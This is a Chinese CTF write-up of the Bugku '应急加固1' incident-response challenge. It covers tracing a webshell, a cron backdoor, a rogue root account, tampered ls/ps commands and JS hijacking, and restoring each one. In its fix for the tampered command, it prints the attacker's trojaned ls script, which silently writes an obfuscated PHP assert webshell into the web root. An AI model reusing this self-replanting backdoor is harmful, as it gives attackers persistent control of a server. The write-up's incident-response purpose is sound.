首页 > 其他分享 >bugku----应急加固1 WP

bugku----应急加固1 WP

时间:2023-11-06 13:11:06浏览次数:35  
标签:ps www bugku ---- 黑客 ls2 ls WP

bugku----应急加固1 WP

1.获取js劫持域名(带https)

https://www.194nb.com

2.黑客首次webshell 密码

导出/var/log/nginx中的日志
全局搜索POST

3.黑客首次攻击(非有效攻击)通过什么方式(如:文件上传、SQL注入、命令执行)

搜索恶意ip,发现是xss

4.请找到黑客留下的后门中黑客服务器的ip及端口

计划任务,刚开始getshell的时候是www-data用户,所以crontab -l -u www-data查看计划任务

5.提交黑客上传的第二个webshell内的flag

投机取巧法:

正常的其中一种做法:
在日志中搜索eval,发现有一个1.php

6.修复mysql可getshell漏洞

先找到mysql的配置文件

然后在secure-file-priv=后面填上null

重启mysql服务

7.找到黑客添加的账号并删除

发现一个用户有root特权


8.修复黑客篡改的命令并且删除篡改命令生成的免杀马

发现ls和正常的ls有很大不同
服务器ls(竖版)

正常ls(横版)


发现ls2是正常的,所以删除掉ls,然后把ls2替换回ls

#bin/bash
oldifs="$IFS"
IFS=$'\n'
result=$(ls2 $1 $2 $3)
for v in $result;
do
    echo -e "$v\t";
done
IFS="$oldifs"

echo "<?php \$aa="_GET";@array_map(implode('',['a','s','s','e','r','t']),\$\$aa);  //flag{5t945bbwxokj87f1ucjb2vc7zdnf8ix3}?>" > /var/www/html/public/static/img/1.php


然后删掉 /var/www/html/public/static/img/1.php就可以了
9.修复黑客篡改的命令2

ps和ps_可疑
rm -rf ps && mv ps_ ps


10.修复JS劫持

抓包发现可能的js劫持代码

然后回到服务器进行搜索


按dd删掉一整行

标签:ps,www,bugku,----,黑客,ls2,ls,WP
From: https://www.cnblogs.com/thebeastofwar/p/17812406.html

相关文章

  • 解决适用EntityFramework生成时报错“无法解析依赖项。"EntityFramework 6.4.4" 与 '
    点击添加,出现错误提示:......
  • ASP.NET窗体开发实现下载Excel表格数据
    使用Excel表格下载,还是要先下载NPOI插件,下载安装后,才能直接下载Excel表格。usingSystem;usingSystem.Collections.Generic;usingSystem.Data;usingSystem.IO;usingSystem.Linq;usingSystem.Web;usingSystem.Web.UI;usingSystem.Web.UI.WebControls;usingEnglishPr......
  • 贪心算法和快排解决活动安排
    #include<stdio.h>#include<stdlib.h>//快速排序法voidquick_sort(int*a,int*b,intlow,inthigh){if(low>=high){return;}//递归要有一个条件使它停下来。//使数组按右边的大小从上到下依次增大intleft=low;intright=high;inttemp=rand()%(high-......
  • 如何使用K8S部署wordpress
    要在Kubernetes(K8S)中部署WordPress,您需要以下步骤:配置Kubernetes集群:首先,您需要正确配置Kubernetes集群。这包括设置Kubernetes控制平面和工作节点,并确保它们能够正常通信。创建PersistentVolume和PersistentVolumeClaim:WordPress需要持久存储来保存数据,例如用户上......
  • 即时通讯技术文集(第22期):IM安全相关文章(Part1) [共13篇]
    ​为了更好地分类阅读52im.net总计1000多篇精编文章,我将在每周三推送新的一期技术文集,本次是第22 期。[- 1 -] 即时通讯安全篇(一):正确地理解和使用Android端加密算法[链接] http://www.52im.net/thread-216-1-1.html[摘要] 本文主要讨论针对Android这样的移动端应用开......
  • Vue3 中的hook函数和 toRef(toRefs)
    一、自定义hook函数  1、什么是hook?      本质是一个函数,把setup函数中使用的CompositionAPI进行了封装  2、类似于vue2.x中的mixin  3、自定义hook的优势:复用代码,让setup中的逻辑更清楚易懂。二、toRef  1、作用:创建一个ref对象,其valu......
  • 虎虎PCB灯光画
    闲来无事看到bilibili上别人画的灯光画,觉得很帅,决定给实验室做一个类似的周边。先做一个demo测试。基本思路就是USB供电,LDO降压,加限流电阻,最后用陶瓷LED灯丝提供光源。原理图如图,毕竟不是正经画板子,画得比较草率然后就是PCB走线,顶层除了电源基本不走线,紫色部分是顶层的阻焊开窗......
  • 【蠢人日记/silly dairy】
    exam1importmathp=sqrt(4)#wrongp=math.sqrt(4)#rightdeff(x=3,y=4):p=1returnpans=f(x,y)#wrongans=f(x=2,y=3)#rightans=f(2)#rightf函数中x=2,y=4range(1,10,1)#rightrange(1:10:1)#wrongdeff(x=3,y=4):f=1returnf#right......
  • 提升应用性能:Go中的同步与异步处理
    提升应用性能:Go中的同步与异步处理原创 TimLiu 爱发白日梦的后端 2023-11-0608:00 发表于广东收录于合集#go90个爱发白日梦的后端专注Go语言领域的发展,学习成为更牛逼的架构师,日常分享Go语言、架构、软件工具的使用。124篇原创内容公众号在开......
  • OpenRemoteDesktop
    staticvoidMain(string[]args){OpenRemoteDesktopm_open=newOpenRemoteDesktop();m_open.Openrdesktop("www.domain.com.cn","Administrator","p@ssword");}publicclassOpenRemo......